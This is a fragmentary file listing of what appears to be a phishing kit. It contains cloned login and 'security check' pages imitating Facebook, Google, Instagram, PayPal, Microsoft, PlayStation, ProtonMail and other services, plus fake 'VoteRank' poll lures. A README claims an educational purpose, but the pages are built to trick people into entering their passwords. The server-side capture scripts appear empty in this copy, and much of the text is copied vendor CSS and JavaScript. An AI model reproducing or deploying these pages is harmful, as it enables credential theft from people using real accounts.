| Shape 4 | Created with Sketch. 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /sites/yandex/dropbox/dropbox6.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /sites/yandex/dropbox/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/dropbox/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/ebay/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/ebay/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/facebook/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 KasRoudra 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /sites/yandex/facebook/README.md: -------------------------------------------------------------------------------- 1 | # Facebook Static Login Form (Full offline css and js) 2 | 3 | ## Author: [KasRoudra](https://github.com/KasRoudra) 4 | 5 | #### This is created for educational purposes demonstrating how phishing works. 6 | 7 | ### Use/Copy it legally and provide proper credit -------------------------------------------------------------------------------- /sites/yandex/facebook/hsts-pixel.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/facebook/hsts-pixel.gif -------------------------------------------------------------------------------- /sites/yandex/facebook/index.php: -------------------------------------------------------------------------------- 1 | 2 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /sites/yandex/facebook/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/facebook/logo.svg: -------------------------------------------------------------------------------- 1 | FBWordmark_Hex-RGB-1024 2 | -------------------------------------------------------------------------------- /sites/yandex/fb_advanced/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/fb_advanced/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /sites/yandex/fb_advanced/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/fb_advanced/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 109 | 110 |
111 |

VOTERANK

112 |

#289032

113 |
114 | 127 | 128 | -------------------------------------------------------------------------------- /sites/yandex/fb_advanced/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /sites/yandex/fb_messenger/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/fb_messenger/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/fb_security/fb-ico.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/fb_security/fb-ico.png -------------------------------------------------------------------------------- /sites/yandex/fb_security/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/fb_security/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Security Check 6 | 7 | 8 | 9 | 10 |
11 |
12 | 15 |
16 |
17 |
18 |
19 | 22 |
23 |

Verify needed to understand it's you

24 |

Enter your password for security reason (make sure your caps lock is off)

25 |

Forgot your password ? Request new one 26 |

27 | 28 | 39 | 40 |
41 | 42 | 67 |
68 | 69 | 70 | -------------------------------------------------------------------------------- /sites/yandex/fb_security/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/fb_security/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/fb_security/logo.png -------------------------------------------------------------------------------- /sites/yandex/fb_security/style.css: -------------------------------------------------------------------------------- 1 | h1, h2, h3, h4, h5, a, p, ul, li, img, header, section, div, body {margin: 0; padding: 0;} 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | header { 10 | width: 1348px; 11 | height: 84px; 12 | background: #3B5998; 13 | } 14 | 15 | .main-header { 16 | padding-left:184px; 17 | } 18 | 19 | 20 | 21 | .form { 22 | border: 1px solid #cccccc; 23 | border-radius: 5px; 24 | height: 420px; 25 | margin: 60px auto 45px; 26 | width: 641px; 27 | } 28 | 29 | .form h3 { 30 | color: #333333; 31 | border-bottom: 1.5px solid #cccccc; 32 | font-family: tahoma; 33 | font-size: 18px; 34 | font-weight: 600; 35 | margin: 0 20px; 36 | padding: 20px 0 12px; 37 | } 38 | .red-box { 39 | margin:24px auto 0; 40 | width: 600px; 41 | height: 97px; 42 | background: #FFEBE8; 43 | border: 1.5px solid red; 44 | } 45 | 46 | 47 | .red-box p { 48 | font-size: 10.5px; 49 | font-family: tahoma; 50 | padding: 14px 0 0 20px; 51 | } 52 | 53 | .red-box a { 54 | text-decoration: none; 55 | color: #3B5998; 56 | } 57 | 58 | .red-box a:hover { 59 | text-decoration: underline; 60 | } 61 | 62 | .login-form { 63 | width:75%; 64 | margin: 0 auto; 65 | padding: 23px 0 0 0; 66 | } 67 | .login-form label { 68 | font-family: tahoma; 69 | font-size: 13px; 70 | padding: 2px 10px 3px 5px; 71 | } 72 | .login-form input { 73 | padding: 2px 10px 3px 5px; 74 | } 75 | 76 | 77 | footer { 78 | width: 984px; 79 | margin:0 auto; 80 | border-top: 1.5px solid #cccccc; 81 | } 82 | 83 | ul li { 84 | display: inline; 85 | margin: 0 0 0 28px; 86 | } 87 | 88 | 89 | ul li a { 90 | text-decoration: none; 91 | font-family: tahoma; 92 | font-size: 10.5px; 93 | color: #3B5998; 94 | } 95 | ul li a:hover { 96 | text-decoration: underline; 97 | } 98 | -------------------------------------------------------------------------------- /sites/yandex/github/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/github/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/gitlab/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/gitlab/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/google/avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/google/avatar.png -------------------------------------------------------------------------------- /sites/yandex/google/google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/google/google.png -------------------------------------------------------------------------------- /sites/yandex/google/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/google/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/google_new/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/google_new/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/google_poll/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/google_poll/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /sites/yandex/google_poll/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/google_poll/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 118 | 119 |
120 |

VOTERANK

121 |

#289032

122 |
123 | 124 | 136 | 137 | 138 | -------------------------------------------------------------------------------- /sites/yandex/google_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /sites/yandex/ig_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/ig_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/ig_verify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/ig_verify/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/ig_verify/login2.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/insta_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/insta_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/instagram/badge_android_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/badge_android_english-en.png -------------------------------------------------------------------------------- /sites/yandex/instagram/badge_ios_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/badge_ios_english-en.png -------------------------------------------------------------------------------- /sites/yandex/instagram/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/favicon.png -------------------------------------------------------------------------------- /sites/yandex/instagram/home-phones.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/home-phones.png -------------------------------------------------------------------------------- /sites/yandex/instagram/home-phones@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/home-phones@2x.png -------------------------------------------------------------------------------- /sites/yandex/instagram/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/instagram/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/instagram/screenshot1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/screenshot1.jpg -------------------------------------------------------------------------------- /sites/yandex/instagram/screenshot2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/screenshot2.jpg -------------------------------------------------------------------------------- /sites/yandex/instagram/screenshot3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/screenshot3.jpg -------------------------------------------------------------------------------- /sites/yandex/instagram/screenshot4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/screenshot4.jpg -------------------------------------------------------------------------------- /sites/yandex/instagram/screenshot5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/screenshot5.jpg -------------------------------------------------------------------------------- /sites/yandex/instagram/sprite_core_2x_bcd90c1d4868.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/sprite_core_2x_bcd90c1d4868.png -------------------------------------------------------------------------------- /sites/yandex/instagram/sprite_core_32f0a4f27407.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/instagram/sprite_core_32f0a4f27407.png -------------------------------------------------------------------------------- /sites/yandex/linkedin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/linkedin/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/mediafire/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/mediafire/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/microsoft/ellipsis_grey.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /sites/yandex/microsoft/ellipsis_white.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /sites/yandex/microsoft/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/microsoft/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/microsoft/microsoft_logo.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /sites/yandex/microsoft/prefetch.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Prefetch 5 | 6 | 7 | 8 | 14 | 15 | 16 | 20 | 21 | 22 | 23 | 24 | A -------------------------------------------------------------------------------- /sites/yandex/microsoft/sprite1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/microsoft/sprite1.png -------------------------------------------------------------------------------- /sites/yandex/netflix/FB-f-Logo__blue_57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/netflix/FB-f-Logo__blue_57.png -------------------------------------------------------------------------------- /sites/yandex/netflix/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/netflix/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/origin/EA_Origin_Lockup_Black.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/origin/EA_Origin_Lockup_Black.png -------------------------------------------------------------------------------- /sites/yandex/origin/api.js: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function() {var CFG='___grecaptcha_cfg';if(!window[CFG]){window[CFG]={};}var GR='grecaptcha';if(!window[GR]){window[GR]={};}window[GR].ready=window[GR].ready||function(f){(window[CFG]['fns']=window[CFG]['fns']||[]).push(f);};(window[CFG]['render']=window[CFG]['render']||[]).push('onload');window['__google_recaptcha_client']=true;var po=document.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/api2/v1528855115741/recaptcha__en.js';var elem=document.querySelector('script[nonce]');var n=elem&&(elem['nonce']||elem.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})(); -------------------------------------------------------------------------------- /sites/yandex/origin/iframe_api.js: -------------------------------------------------------------------------------- 1 | 2 | if (!window['YT']) {var YT = {loading: 0,loaded: 0};}if (!window['YTConfig']) {var YTConfig = {'host': 'http://www.youtube.com'};}if (!YT.loading) {YT.loading = 1;(function(){var l = [];YT.ready = function(f) {if (YT.loaded) {f();} else {l.push(f);}};window.onYTReady = function() {YT.loaded = 1;for (var i = 0; i < l.length; i++) {try {l[i]();} catch (e) {}}};YT.setConfig = function(c) {for (var k in c) {if (c.hasOwnProperty(k)) {YTConfig[k] = c[k];}}};var a = document.createElement('script');a.type = 'text/javascript';a.id = 'www-widgetapi-script';a.src = 'https://s.ytimg.com/yts/jsbin/www-widgetapi-vfl3m9ZW-/www-widgetapi.js';a.async = true;var c = document.currentScript;if (c) {var n = c.nonce || c.getAttribute('nonce');if (n) {a.setAttribute('nonce', n);}}var b = document.getElementsByTagName('script')[0];b.parentNode.insertBefore(a, b);})();} -------------------------------------------------------------------------------- /sites/yandex/origin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/origin/jquery_002.js: -------------------------------------------------------------------------------- 1 | (function(a,b){a.fn.originLayout=function(e,g){var f={};var d={init:function(){a("form").bind("submit.originLayout",d.events.originFormSubmit);a(".panel-action-area .btn-next").bind("click.originLayout",d.events.originNextButtonClick)},events:{originFormSubmit:function(h){a(".panel-action-area .origin-ux-button",this).addClass("disabled").unbind("click").bind("click",function(i){i.preventDefault()})},originNextButtonClick:function(h){if(a(this).hasClass("disabled")){h.stopImmediatePropagation()}else{a(this).parent(".panel-action-area").find(".origin-ux-button").addClass("disabled")}return false}},helpers:{}};var c=["init"];if(typeof e==="object"||!e){d.init()}else{if(a.inArray(e,c)){}}}})(jQuery);$(document).ready(function(){$.fn.originLayout()}); -------------------------------------------------------------------------------- /sites/yandex/origin/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/origin/originX-pc-common.css: -------------------------------------------------------------------------------- 1 | .form-container{display:block;position:static;clear:both;width:480px;margin:auto;top:calc(50% - 324px);left:calc(50% - 240px);-webkit-animation:none;-moz-animation:none;-o-animation:none;animation:none}.views{border-radius:0 0 4px 4px;color:#141b20;background-color:#fff}nav.otknavbar{height:58px}a{text-decoration:none}a:hover{text-decoration:underline}a.otkbtn{text-decoration:none!important}body{font-family:'Open Sans',sans-serif;text-rendering:optimizeLegibility;-webkit-font-smoothing:antialiased;height:100%;min-height:100%;margin:0;overflow:hidden}.otknav.otknav-pills{border-bottom:1px solid #c3c6ce;height:58px;overflow:hidden;padding-left:40px}.otknav.otknav-pills li.otkpill-active:after{content:"";height:3px;width:100%;position:absolute;bottom:0;background:#f56c2d}section{height:calc(708px - 98px);padding:24px 40px;overflow:auto}section .otkbtn{margin:24px 0 6px 0}section h1{margin:12px 0 24px 0!important}.general-error{background:#d80000 url(../../../ui/core/img/background-general-error.png) right -49px;height:49px;overflow:hidden;display:none;width:100%;margin:0;padding:0}.otklabel{width:100%;display:block;margin:24px 0 12px 0}.otkform-group-help{display:none}p.otkform-group-help{margin:6px auto 12px auto}.otkform-group-haserror.otkform-group-help{display:block}.otkform{margin-bottom:24px}.otkcheckbox>label{vertical-align:middle;line-height:24px;white-space:normal}.otkcheckbox>input,.otkradio>input{display:block;opacity:0;position:absolute}.otkcheckbox.focus>label:before,.otkradio.focus>label:before,.otkselect.focus>.otkselect-label{border:1px solid #f56c2d}.otkbtn-primary.disabled{cursor:default;opacity:.45;pointer-events:none}select.disabled{pointer-events:none}.otknotice-stripe-message .otkicon{left:0}.otkform-group-field.otkicon{top:0;display:block}.otkicon-checkcircle,.otkicon-challenge{left:-18px;color:#04bd68;-webkit-animation:popIn .5s ease-in-out;-moz-animation:popIn .5s ease-in-out;-o-animation:popIn .5s ease-in-out;animation:popIn .5s ease-in-out}.otkicon-warning{left:-18px;color:#fea722;-webkit-animation:popIn .5s ease-in-out;-moz-animation:popIn .5s ease-in-out;-o-animation:popIn .5s ease-in-out;animation:popIn .5s ease-in-out}.otkicon-warning:before,.otkicon-checkcircle:before,.otkicon-challenge:before{display:block;font-size:96px}.right{float:right}.otkbtn:hover{background:#c85e36}footer{height:40px;margin:0;padding:0;top:0;border-radius:0 0 4px 4px;color:#787d85;background-color:#edf1f2;display:block;clear:both;position:relative;overflow:hidden}footer img{height:20px;margin:10px 12px 10px 24px}img{vertical-align:middle}.upgrade-privacy-friend{margin-bottom:12px;display:inline-block}.otkinput-capslock{display:none;position:absolute;top:50%;left:330px;-webkit-transform:translate(0,-50%);-ms-transform:translate(0,-50%);transform:translate(0,-50%);z-index:2;color:#c3c6ce;font-size:32px}.otkicon-capslock-position{left:295px}.otkinput-capslock-visible{display:block}*,*:before,*:after{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}*{padding:0;margin:0;-webkit-backface-visibility:hidden} -------------------------------------------------------------------------------- /sites/yandex/paypal/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/paypal/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/pinterest/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/pinterest/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/playstation/api.js.download: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};(cfg['enterprise']=cfg['enterprise']||[]).push(false);(cfg['render']=cfg['render']||[]).push('explicit');(cfg['onload']=cfg['onload']||[]).push('widgetLoaded');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/releases/5fbZx3NV5xhaMoMLrZV3TkN4/recaptcha__en_gb.js';var e=d.querySelector('script[nonce]'),n=e&&(e['nonce']||e.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=d.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s); })(); -------------------------------------------------------------------------------- /sites/yandex/playstation/button_icon_password_off.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/playstation/button_icon_password_off.png -------------------------------------------------------------------------------- /sites/yandex/playstation/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/playstation/kekka-22361ea3e8890b95e7b006a784440d01.css: -------------------------------------------------------------------------------- 1 | /** 2 | * kekka.css 3 | * Copyright 2016 Sony Corporation 4 | * 5 | */ 6 | 7 | * :not(p):not(h2):not(h3):not(ul):not(li){margin:0;padding:0;-webkit-tap-highlight-color:transparent}body,html{height:100%}body{overflow:hidden;font-family:-apple-system,BlinkMacSystemFont,'Helvetica Neue',Helvetica,HiraKakuProN-W3,'Noto Sans CJK JP',sans-serif;-webkit-text-size-adjust:100%}span{unicode-bidi:embed}html{font-size:10px} 8 | -------------------------------------------------------------------------------- /sites/yandex/playstation/loading.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/playstation/loading.png -------------------------------------------------------------------------------- /sites/yandex/playstation/loading_base.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/playstation/loading_base.png -------------------------------------------------------------------------------- /sites/yandex/playstation/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/playstation/logo_playstation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/playstation/logo_playstation.png -------------------------------------------------------------------------------- /sites/yandex/playstation/saved_resource: -------------------------------------------------------------------------------- 1 | ndwti({"wi":"w-666234","wmd":{"ipr":{"fm":[],"lm":true,"tl":20000},"wk":{"r":"test"},"di":{"rt":128,"ut":512},"af":[]},"fd":{"ipr":"p","bi":"p","wt":"1.w-666234.1.2.4ODTuykD3bYvqj9RpaK5gw,,.I2PzRDkmu3FRo1eMxiTzb7fp9vKKTvu44DXdevnl1nf38CBmmTErco0FkBbSYGiiX1Iy6chd2bUFDuidinMfM7Et6PpjVbrSCaWoqZ3REB5jioKKtRRF_CYwy2Pe2KdMrSr1tPWzMnfKriMbHKEStZLeR0tj3FShVopqekSIwljoEtpOBBZMvXKezIF1CaqhjSKnH9JYg0l5yRw9UHN329dfmmixtzC1RF3ZrjKLTlTJrmC3TR2j3UxUU41NTKTtXNo33HJr-Z3ZCuKAzXhdyQ,,"},"gf":[]}) -------------------------------------------------------------------------------- /sites/yandex/playstation/sony_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/playstation/sony_logo.png -------------------------------------------------------------------------------- /sites/yandex/playstation/vendor-571d67531622102402268bd2c623c17f.css: -------------------------------------------------------------------------------- 1 | .liquid-container{position:relative;overflow:hidden;-webkit-transform:translateY(0);-moz-transform:translateY(0);transform:translateY(0)}.liquid-child{overflow:hidden} -------------------------------------------------------------------------------- /sites/yandex/playstation/wallpaper.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/playstation/wallpaper.jpg -------------------------------------------------------------------------------- /sites/yandex/protonmail/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/protonmail/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/protonmail/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/protonmail/logo.png -------------------------------------------------------------------------------- /sites/yandex/quora/iframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /sites/yandex/quora/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/quora/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/reddit/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/reddit/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /sites/yandex/snapchat/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/snapchat/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/spotify/api.js: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function() {var CFG='___grecaptcha_cfg';if(!window[CFG]){window[CFG]={};}var GR='grecaptcha';if(!window[GR]){window[GR]={};}window[GR].ready=window[GR].ready||function(f){(window[CFG]['fns']=window[CFG]['fns']||[]).push(f);};(window[CFG]['render']=window[CFG]['render']||[]).push('explicit');window['__google_recaptcha_client']=true;var po=document.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/api2/v1528855115741/recaptcha__en.js';var elem=document.querySelector('script[nonce]');var 